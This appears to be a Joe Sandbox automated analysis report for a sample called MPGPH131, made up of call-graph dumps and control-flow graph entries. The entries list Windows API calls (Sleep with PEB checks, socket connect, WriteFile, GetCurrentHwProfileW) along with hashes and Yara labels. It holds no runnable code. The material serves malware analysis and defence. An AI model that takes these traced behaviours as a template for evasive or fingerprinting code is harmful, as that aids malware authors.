b15bdb __Getctype RtlAllocateHeap 18625->18626 18628 b1f508 std::_Lockit::_Lockit 18626->18628 18627 b1f54e 18627->18617 18628->18627 18629 b1f574 __Getctype RtlAllocateHeap 18628->18629 18630 b1f537 __Getctype 18629->18630 18630->18627 18631 b10259 __Getctype RtlAllocateHeap 18630->18631 18632 b1f573 18631->18632 18634 b15bdb __Getctype RtlAllocateHeap 18633->18634 18635 b1d823 18634->18635 18636 b1d736 std::_Locinfo::_Locinfo_ctor RtlAllocateHeap RtlAllocateHeap 18635->18636 18637 b1d82e 18636->18637 18637->18623 18639 b0480d __fread_nolock 18638->18639 18640 b04814 18639->18640 18641 b04835 __fread_nolock 18639->18641 18642 b04723 ___std_exception_copy RtlAllocateHeap 18640->18642 18645 b04910 18641->18645 18644 b0482d 18642->18644 18644->18220 18648 b04942 18645->18648 18647 b04922 18647->18644 18649 b04951 18648->18649 18650 b04979 18648->18650 18651 b04723 ___std_exception_copy RtlAllocateHeap 18649->18651 18652 b15f82 __fread_nolock RtlAllocateHeap 18650->18652 18660 b0496c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 18651->18660 18653 b04982 18652->18653 18661 b0e11f 18653->18661 18656 b04a2c 18664 b04cae 18656->18664 18658 b04a43 18658->18660 18672 b04ae3 18658->18672 18660->18647 18679 b0df37 18661->18679 18663 b049a0 18663->18656 18663->18658 18663->18660 18665 b04cbd 18664->18665 18666 b15f82 __fread_nolock RtlAllocateHeap 18665->18666 18667 b04cd9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 18666->18667 18668 b0e11f 2 API calls 18667->18668 18671 b04ce5 _ValidateLocalCookies 18667->18671 18669 b04d39 18668->18669 18670 b0e11f 2 API calls 18669->18670 18669->18671 18670->18671 18671->18660 18673 b15f82 __fread_nolock RtlAllocateHeap 18672->18673 18674 b04af6 18673->18674 18675 b0e11f 2 API calls 18674->18675 18678 b04b40 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 18674->18678 18676 b04b9d 18675->18676 18677 b0e11f 2 API calls 18676->18677 18676->18678 18677->18678 18678->18660 18680 b0df43 __fread_nolock 18679->18680 18681 b0df86 18680->18681 18683 b0df4b 18680->18683 18684 b0dfcc 18680->18684 18682 b04723 ___std_exception_copy RtlAllocateHeap 18681->18682 18682->18683 18683->18663 18684->18683 18685 b0e05c __fread_nolock 2 API calls 18684->18685 18685->18683 18687 a906a9 18686->18687 18691 a90585 18686->18691 18688 a22270 RtlAllocateHeap 18687->18688 18689 a906ae 18688->18689 18690 a221d0 Concurrency::cancel_current_task RtlAllocateHeap 18689->18690 18699 a905aa __fread_nolock std::locale::_Init 18690->18699 18692 a905f0 18691->18692 18693 a905e3 18691->18693 18696 a9059a 18691->18696 18698 aff290 std::_Facet_Register RtlAllocateHeap 18692->18698 18692->18699 18693->18689 18693->18696 18694 aff290 std::_Facet_Register RtlAllocateHeap 18694->18699 18695 b047b0 RtlAllocateHeap 18697 a906b8 18695->18697 18696->18694 18698->18699 18699->18695 18700 a90667 __fread_nolock std::locale::_Init 18699->18700 18700->18226 18703 b0dc08 __fread_nolock 18701->18703 18702 b0dc40 __fread_nolock 18702->18230 18703->18702 18705 b0dc52 __fread_nolock 18703->18705 18706 b0dc1b __fread_nolock 18703->18706 18704 b0d23f __dosmaperr RtlAllocateHeap 18707 b0dc35 18704->18707 18710 b0da06 18705->18710 18706->18704 18709 b047a0 ___std_exception_copy RtlAllocateHeap 18707->18709 18709->18702 18711 b0da35 18710->18711 18714 b0da18 __fread_nolock 18710->18714 18711->18702 18712 b0da25 18713 b0d23f __dosmaperr RtlAllocateHeap 18712->18713 18721 b0da2a 18713->18721 18714->18711 18714->18712 18716 b0da76 __fread_nolock 18714->18716 18715 b047a0 ___std_exception_copy RtlAllocateHeap 18715->18711 18716->18711 18717 b0dba1 __fread_nolock 18716->18717 18719 b15f82 __fread_nolock RtlAllocateHeap 18716->18719 18723 b14623 18716->18723 18782 b08a2b 18716->18782 18720 b0d23f __dosmaperr RtlAllocateHeap 18717->18720 18719->18716 18720->18721 18721->18715 18724 b14635 18723->18724 18725 b1464d 18723->18725 18726 b0d22c __dosmaperr RtlAllocateHeap 18724->18726 18727 b1498f 18725->18727 18730 b14690 18725->18730 18729 b1463a 18726->18729 18728 b0d22c __dosmaperr RtlAllocateHeap 18727->18728 18731 b14994 18728->18731 18732 b0d23f __dosmaperr RtlAllocateHeap 18729->18732 18733 b1469b 18730->18733 18737 b14642 18730->18737 18741 b146cb 18730->18741 18734 b0d23f __dosmaperr RtlAllocateHeap 18731->18734 18732->18737 18735 b0d22c __dosmaperr RtlAllocateHeap 18733->18735 18736 b146a8 18734->18736 18738 b146a0 18735->18738 18740 b047a0 ___std_exception_copy RtlAllocateHeap 18736->18740 18737->18716 18739 b0d23f __dosmaperr RtlAllocateHeap 18738->18739 18739->18736 18740->18737 18742 b146e4 18741->18742 18743 b146f1 18741->18743 18744 b1471f 18741->18744 18742->18743 18750 b1470d 18742->18750 18745 b0d22c __dosmaperr RtlAllocateHeap 18743->18745 18796 b16e2d 18744->18796 18747 b146f6 18745->18747 18748 b0d23f __dosmaperr RtlAllocateHeap 18747->18748 18752 b146fd 18748->18752 18749 b20d44 __fread_nolock RtlAllocateHeap 18767 b1486b 18749->18767 18750->18749 18754 b047a0 ___std_exception_copy RtlAllocateHeap 18752->18754 18753 b16db3 __freea RtlAllocateHeap 18755 b14739 18753->18755 18781 b14708 __fread_nolock 18754->18781 18757 b16db3 __freea RtlAllocateHeap 18755->18757 18756 b148e3 ReadFile 18758 b14957 18756->18758 18759 b148fb 18756->18759 18760 b14740 18757->18760 18770 b14964 18758->18770 18779 b148b5 18758->18779 18759->18758 18761 b148d4 18759->18761 18762 b14765 18760->18762 18763 b1474a 18760->18763 18773 b14920 18761->18773 18774 b14937 18761->18774 18761->18781 18766 b0e13d __fread_nolock 2 API calls 18762->18766 18764 b0d23f __dosmaperr RtlAllocateHeap 18763->18764 18768 b1474f 18764->18768 18765 b16db3 __freea RtlAllocateHeap 18765->18737 18766->18750 18767->18756 18769 b1489b 18767->18769 18771 b0d22c __dosmaperr RtlAllocateHeap 18768->18771 18769->18761 18769->18779 18772 b0d23f __dosmaperr RtlAllocateHeap 18770->18772 18771->18781 18776 b14969 18772->18776 18807 b14335 18773->18807 18774->18781 18817 b1417b 18774->18817 18780 b0d22c __dosmaperr RtlAllocateHeap 18776->18780 18779->18781 18802 b0d1e5 18779->18802 18780->18781 18781->18765 18783 b08a3c 18782->18783 18792 b08a38 std::locale::_Init 18782->18792 18784 b08a43 18783->18784 18785 b08a56 __fread_nolock 18783->18785 18786 b0d23f __dosmaperr RtlAllocateHeap 18784->18786 18789 b08a84 18785->18789 18790 b08a8d 18785->18790 18785->18792 18787 b08a48 18786->18787 18788 b047a0 ___std_exception_copy RtlAllocateHeap 18787->18788 18788->18792 18791 b0d23f __dosmaperr RtlAllocateHeap 18789->18791 18790->18792 18794 b0d23f __dosmaperr RtlAllocateHeap 18790->18794 18793 b08a89 18791->18793 18792->18716 18795 b047a0 ___std_exception_copy RtlAllocateHeap 18793->18795 18794->18793 18795->18792 18797 b16e6b 18796->18797 18801 b16e3b __dosmaperr std::_Facet_Register 18796->18801 18798 b0d23f __dosmaperr RtlAllocateHeap 18797->18798 18800 b14730 18798->18800 18799 b16e56 RtlAllocateHeap 18799->18800 18799->18801 18800->18753 18801->18797 18801->18799 18803 b0d22c __dosmaperr RtlAllocateHeap 18802->18803 18804 b0d1f0 __dosmaperr 18803->18804 18805 b0d23f __dosmaperr RtlAllocateHeap 18804->18805 18806 b0d203 18805->18806 18806->18781 18821 b1402e 18807->18821 18810 b143d7 18813 b14391 __fread_nolock 18810->18813 18815 b0e13d __fread_nolock 2 API calls 18810->18815 18811 b143c7 18812 b0d23f __dosmaperr RtlAllocateHeap 18811->18812 18814 b1437d 18812->18814 18813->18814 18816 b0d1e5 __dosmaperr RtlAllocateHeap 18813->18816 18814->18781 18815->18813 18816->18814 18819 b141b5 18817->18819 18818 b14246 18818->18781 18819->18818 18820 b0e13d __fread_nolock 2 API calls 18819->18820 18820->18818 18822 b14062 18821->18822 18823 b140ce 18822->18823 18824 b0e13d __fread_nolock 2 API calls 18822->18824 18823->18810 18823->18811 18823->18813 18823->18814 18824->18823 18826 b08acf __fread_nolock 18825->18826 18827 b08ad9 18826->18827 18828 b08afc __fread_nolock 18826->18828 18829 b04723 ___std_exception_copy RtlAllocateHeap 18827->18829 18831 b08af4 18828->18831 18832 b08b5a 18828->18832 18829->18831 18831->18234 18833 b08b67 18832->18833 18834 b08b8a 18832->18834 18835 b04723 ___std_exception_copy RtlAllocateHeap 18833->18835 18836 b08b82 18834->18836 18837 b055d3 4 API calls 18834->18837 18835->18836 18836->18831 18838 b08ba2 18837->18838 18846 b16ded 18838->18846 18841 b15f82 __fread_nolock RtlAllocateHeap 18842 b08bb6 18841->18842 18850 b14a3f 18842->18850 18845 b16db3 __freea RtlAllocateHeap 18845->18836 18847 b16e04 18846->18847 18848 b08baa 18846->18848 18847->18848 18849 b16db3 __freea RtlAllocateHeap 18847->18849 18848->18841 18849->18848 18852 b14a68 18850->18852 18854 b08bbd 18850->18854 18851 b14ab7 18853 b04723 ___std_exception_copy RtlAllocateHeap 18851->18853 18852->18851 18855 b14a8f 18852->18855 18853->18854 18854->18836 18854->18845 18857 b149ae 18855->18857 18858 b149ba __fread_nolock 18857->18858 18860 b149f9 18858->18860 18861 b14b12 18858->18861 18860->18854 18862 b1a6de __fread_nolock RtlAllocateHeap 18861->18862 18864 b14b22 18862->18864 18866 b1a6de __fread_nolock RtlAllocateHeap 18864->18866 18870 b14b28 18864->18870 18872 b14b5a 18864->18872 18865 b1a6de __fread_nolock RtlAllocateHeap 18868 b14b66 FindCloseChangeNotification 18865->18868 18867 b14b51 18866->18867 18869 b1a6de __fread_nolock RtlAllocateHeap 18867->18869 18868->18870 18869->18872 18873 b1a64d 18870->18873 18871 b14b80 __fread_nolock 18871->18860 18872->18865 18872->18870 18874 b1a65c 18873->18874 18875 b0d23f __dosmaperr RtlAllocateHeap 18874->18875 18878 b1a686 18874->18878 18876 b1a6c8 18875->18876 18877 b0d22c __dosmaperr RtlAllocateHeap 18876->18877 18877->18878 18878->18871 18944 5590265 GetCurrentHwProfileW 18945 559027e 18944->18945

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 134 a83a40-a83a52 135 a83a55-a83a61 134->135 137 a83b28-a83b31 GetPEB 135->137 138 a83a67-a83a6d 135->138 139 a83b34-a83b48 137->139 138->137 140 a83a73-a83a7f GetPEB 138->140 141 a83b99-a83b9b 139->141 142 a83b4a-a83b4f 139->142 143 a83a80-a83a94 140->143 141->139 142->141 144 a83b51-a83b59 142->144 145 a83ae4-a83ae6 143->145 146 a83a96-a83a9b 143->146 147 a83b60-a83b73 144->147 145->143 146->145 148 a83a9d-a83aa3 146->148 149 a83b92-a83b97 147->149 150 a83b75-a83b88 147->150 151 a83aa5-a83ab8 148->151 149->141 149->147 150->150 152 a83b8a-a83b90 150->152 153 a83aba 151->153 154 a83add-a83ae2 151->154 152->149 155 a83b9d-a83bc2 Sleep 152->155 156 a83ac0-a83ad3 153->156 154->145 154->151 155->135 156->156 157 a83ad5-a83adb 156->157 157->154 158 a83ae8-a83b0d Sleep 157->158 159 a83b13-a83b1a 158->159 159->137 160 a83b1c-a83b22 159->160 160->137 161 a83bc7-a83bd8 call a26bd0 160->161 164 a83bda-a83bdc 161->164 165 a83bde 161->165 166 a83be0-a83bfd call a26bd0 164->166 165->166
                                  APIs
                                  • Sleep.KERNELBASE(000003E9,?,00000001,00000000,?,?,?,?,?,?,?,?,00A83DB6), ref: 00A83B08
                                  • Sleep.KERNELBASE(00000001,?,00000001,00000000,?,?,?,?,?,?,?,?,00A83DB6), ref: 00A83BBA
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000006.00000002.4145594627.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145632604.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145815751.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4146294218.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4147456894.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 34eb4bc3a574a2c5498d8afeb74bad0247bd05aef50cff1fdef18f490ef6086a
                                  • Instruction ID: 6a2578f7545df6b8a253fb0eadcd3590c8e45e8d9c08f7173da4d0b8e9fd901c
                                  • Opcode Fuzzy Hash: 34eb4bc3a574a2c5498d8afeb74bad0247bd05aef50cff1fdef18f490ef6086a
                                  • Instruction Fuzzy Hash: FC51CC76A042198FCF28EF58C4D4EA9B7B1FF44B04B298599D845AF311D732EE05CB80

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 a3e0a0-a3e0d2 WSAStartup 1 a3e1b7-a3e1c0 0->1 2 a3e0d8-a3e102 call a26bd0 * 2 0->2 7 a3e104-a3e108 2->7 8 a3e10e-a3e165 2->8 7->1 7->8 10 a3e1b1 8->10 11 a3e167-a3e16d 8->11 10->1 12 a3e1c5-a3e1cf 11->12 13 a3e16f 11->13 12->10 19 a3e1d1-a3e1d9 12->19 14 a3e175-a3e189 socket 13->14 14->10 16 a3e18b-a3e19b connect 14->16 17 a3e1c1 16->17 18 a3e19d-a3e1a5 closesocket 16->18 17->12 18->14 20 a3e1a7-a3e1b0 18->20 20->10
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000006.00000002.4145594627.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145632604.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145815751.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4146294218.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4147456894.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Startupclosesocketconnectsocket
                                  • String ID:
                                  • API String ID: 3098855095-0
                                  • Opcode ID: c13c6881eea145e856f8583b00b8354aa117361fcaf1ecb7db0dd638a8ffd312
                                  • Instruction ID: ae827200c55012319c5726a828ac9c1968c4935e2ea1e401aa69bdc5b1473048
                                  • Opcode Fuzzy Hash: c13c6881eea145e856f8583b00b8354aa117361fcaf1ecb7db0dd638a8ffd312
                                  • Instruction Fuzzy Hash: F431C172605311ABE720DF29DC4872BB7E4EB95734F004F1DF9A8A72D0D73599048BA2

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 22 b14623-b14633 23 b14635-b14648 call b0d22c call b0d23f 22->23 24 b1464d-b1464f 22->24 42 b149a7 23->42 26 b14655-b1465b 24->26 27 b1498f-b1499c call b0d22c call b0d23f 24->27 26->27 28 b14661-b1468a 26->28 45 b149a2 call b047a0 27->45 28->27 31 b14690-b14699 28->31 34 b146b3-b146b5 31->34 35 b1469b-b146ae call b0d22c call b0d23f 31->35 40 b1498b-b1498d 34->40 41 b146bb-b146bf 34->41 35->45 43 b149aa-b149ad 40->43 41->40 46 b146c5-b146c9 41->46 42->43 45->42 46->35 49 b146cb-b146e2 46->49 51 b146e4-b146e7 49->51 52 b14717-b1471d 49->52 55 b146e9-b146ef 51->55 56 b1470d-b14715 51->56 53 b146f1-b14708 call b0d22c call b0d23f call b047a0 52->53 54 b1471f-b14726 52->54 83 b148c2 53->83 58 b14728 54->58 59 b1472a-b14748 call b16e2d call b16db3 * 2 54->59 55->53 55->56 57 b1478a-b147a9 56->57 61 b14865-b1486e call b20d44 57->61 62 b147af-b147bb 57->62 58->59 92 b14765-b14788 call b0e13d 59->92 93 b1474a-b14760 call b0d23f call b0d22c 59->93 74 b14870-b14882 61->74 75 b148df 61->75 62->61 67 b147c1-b147c3 62->67 67->61 71 b147c9-b147ea 67->71 71->61 76 b147ec-b14802 71->76 74->75 79 b14884-b14893 74->79 80 b148e3-b148f9 ReadFile 75->80 76->61 81 b14804-b14806 76->81 79->75 97 b14895-b14899 79->97 84 b14957-b14962 80->84 85 b148fb-b14901 80->85 81->61 86 b14808-b1482b 81->86 88 b148c5-b148cf call b16db3 83->88 106 b14964-b14976 call b0d23f call b0d22c 84->106 107 b1497b-b1497e 84->107 85->84 90 b14903 85->90 86->61 91 b1482d-b14843 86->91 88->43 99 b14906-b14918 90->99 91->61 100 b14845-b14847 91->100 92->57 93->83 97->80 105 b1489b-b148b3 97->105 99->88 108 b1491a-b1491e 99->108 100->61 101 b14849-b14860 100->101 101->61 125 b148b5-b148ba 105->125 126 b148d4-b148dd 105->126 106->83 109 b14984-b14986 107->109 110 b148bb-b148c1 call b0d1e5 107->110 113 b14920-b14930 call b14335 108->113 114 b14937-b14944 108->114 109->88 110->83 129 b14933-b14935 113->129 116 b14950-b14955 call b1417b 114->116 117 b14946 call b1448c 114->117 130 b1494b-b1494e 116->130 117->130 125->110 126->99 129->88 130->129
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000006.00000002.4145594627.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145632604.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145815751.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4146294218.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4147456894.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1e491a1974102469440201265bcf2b69b03271299a9ac5d9d3220a86be6861bc
                                  • Instruction ID: ae2a1035b4c320be05a89286311bd4f2df56639487e8cbe5274e71c26bfcd8dd
                                  • Opcode Fuzzy Hash: 1e491a1974102469440201265bcf2b69b03271299a9ac5d9d3220a86be6861bc
                                  • Instruction Fuzzy Hash: D7B1D370A04245AFDB11DFA8D881BEEBBF5EF46304F9441D8E544AB2D2CB709D82CB61

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 169 a2a210-a2a2ab call aff290 call a22ae0 174 a2a2b0-a2a2bb 169->174 174->174 175 a2a2bd-a2a2c8 174->175 176 a2a2ca 175->176 177 a2a2cd-a2a2de call b05362 175->177 176->177 180 a2a2e0-a2a305 call b09136 call b04eeb call b09136 177->180 181 a2a351-a2a357 177->181 198 a2a307 180->198 199 a2a30c-a2a316 180->199 182 a2a381-a2a393 181->182 183 a2a359-a2a365 181->183 186 a2a377-a2a37e call aff511 183->186 187 a2a367-a2a375 183->187 186->182 187->186 189 a2a394-a2a3ae call b047b0 187->189 197 a2a3b0-a2a3bb 189->197 197->197 200 a2a3bd-a2a3c8 197->200 198->199 201 a2a328-a2a32f call a8cf60 199->201 202 a2a318-a2a31c 199->202 203 a2a3ca 200->203 204 a2a3cd-a2a3df call b05362 200->204 210 a2a334-a2a33a 201->210 206 a2a320-a2a326 202->206 207 a2a31e 202->207 203->204 211 a2a3e1-a2a3f9 call b09136 call b04eeb call b08be8 204->211 212 a2a3fc-a2a403 204->212 206->210 207->206 213 a2a33e-a2a349 call b0dbdf call b08be8 210->213 214 a2a33c 210->214 211->212 216 a2a405-a2a411 212->216 217 a2a42d-a2a433 212->217 227 a2a34e 213->227 214->213 221 a2a423-a2a42a call aff511 216->221 222 a2a413-a2a421 216->222 221->217 222->221 225 a2a434-a2a45e call b047b0 222->225 236 a2a460-a2a464 225->236 237 a2a46f-a2a474 225->237 227->181 236->237 238 a2a466-a2a46e 236->238
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000006.00000002.4145594627.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145632604.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145815751.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4146294218.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4147456894.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __fread_nolock
                                  • String ID:
                                  • API String ID: 2638373210-0
                                  • Opcode ID: 2107716beb3caaeb489c8cb672c421214d74c3f2344db6e2f35bd12e672d8bd4
                                  • Instruction ID: 27fa3e3a824b522ceb722732df4dfa13ad814aae474bc09b931aff32acfe831d
                                  • Opcode Fuzzy Hash: 2107716beb3caaeb489c8cb672c421214d74c3f2344db6e2f35bd12e672d8bd4
                                  • Instruction Fuzzy Hash: E6713671900214AFDB14DF6CEC49BAEBBE8EF41700F1085ADF8099B682D7B5DA418792

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 239 b1549c-b154be 240 b156b1 239->240 241 b154c4-b154c6 239->241 244 b156b3-b156b7 240->244 242 b154f2-b15515 241->242 243 b154c8-b154e7 call b04723 241->243 246 b15517-b15519 242->246 247 b1551b-b15521 242->247 250 b154ea-b154ed 243->250 246->247 249 b15523-b15534 246->249 247->243 247->249 251 b15547-b15557 call b14fe1 249->251 252 b15536-b15544 call b0e17d 249->252 250->244 257 b155a0-b155b2 251->257 258 b15559-b1555f 251->258 252->251 261 b155b4-b155ba 257->261 262 b15609-b15629 WriteFile 257->262 259 b15561-b15564 258->259 260 b15588-b1559e call b14bb2 258->260 263 b15566-b15569 259->263 264 b1556f-b1557e call b14f79 259->264 280 b15581-b15583 260->280 268 b155f5-b15607 call b1505e 261->268 269 b155bc-b155bf 261->269 266 b15634 262->266 267 b1562b-b15631 262->267 263->264 270 b15649-b1564c 263->270 264->280 274 b15637-b15642 266->274 267->266 287 b155dc-b155df 268->287 275 b155e1-b155f3 call b15222 269->275 276 b155c1-b155c4 269->276 285 b1564f-b15651 270->285 282 b15644-b15647 274->282 283 b156ac-b156af 274->283 275->287 284 b155ca-b155d7 call b15139 276->284 276->285 280->274 282->270 283->244 284->287 289 b15653-b15658 285->289 290 b1567f-b1568b 285->290 287->280 291 b15671-b1567a call b0d208 289->291 292 b1565a-b1566c 289->292 293 b15695-b156a7 290->293 294 b1568d-b15693 290->294 291->250 292->250 293->250 294->240 294->293
                                  APIs
                                  • WriteFile.KERNELBASE(?,00000000,00B09087,?,00000000,00000000,00000000,?,00000000,?,00A2A3EB,00B09087,00000000,00A2A3EB,?,?), ref: 00B15621
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4145632604.0000000000A21000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A20000, based on PE: true
                                  • Associated: 00000006.00000002.4145594627.0000000000A20000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145632604.0000000000B53000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145815751.0000000000B58000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000B5C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000CE5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000DCB000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E00000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E0C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4145840458.0000000000E1A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4146294218.0000000000E1B000.00000080.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000006.00000002.4147456894.0000000000FC2000.00000040.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_a20000_MPGPH131.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: 2c4e7291e69e530703ed9b8fb802cbb41bbe530bb6a42622cf2e86746a9e4095
                                  • Instruction ID: 6deb1a2228be82d1a99bea1c33bec47dd39c2b46d1e1933636b33f7598c0f4c4
                                  • Opcode Fuzzy Hash: 2c4e7291e69e530703ed9b8fb802cbb41bbe530bb6a42622cf2e86746a9e4095
                                  • Instruction Fuzzy Hash: B861A171900519EFDF21DFA8C884EEEBBFAEF99304F9401C5E804A7255D775DA818BA0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 297 5590265-5590273 GetCurrentHwProfileW 298 559027e-55904cd call 5590359 call 55904cf 297->298
                                  APIs
                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 0559026E
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4153674973.0000000005590000.00000040.00001000.00020000.00000000.sdmp, Offset: 05590000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_5590000_MPGPH131.jbxd
                                  Similarity
                                  • API ID: CurrentProfile
                                  • String ID:
                                  • API String ID: 2104809126-0
                                  • Opcode ID: c350eed173f9484ed697c54c0be256f93644a4ce9f34049a787886fb40594132
                                  • Instruction ID: 599d11f5a8ed63d8c22c38ec653171bb42c7203404ea4401b6a0e8b3afe561e4
                                  • Opcode Fuzzy Hash: c350eed173f9484ed697c54c0be256f93644a4ce9f34049a787886fb40594132
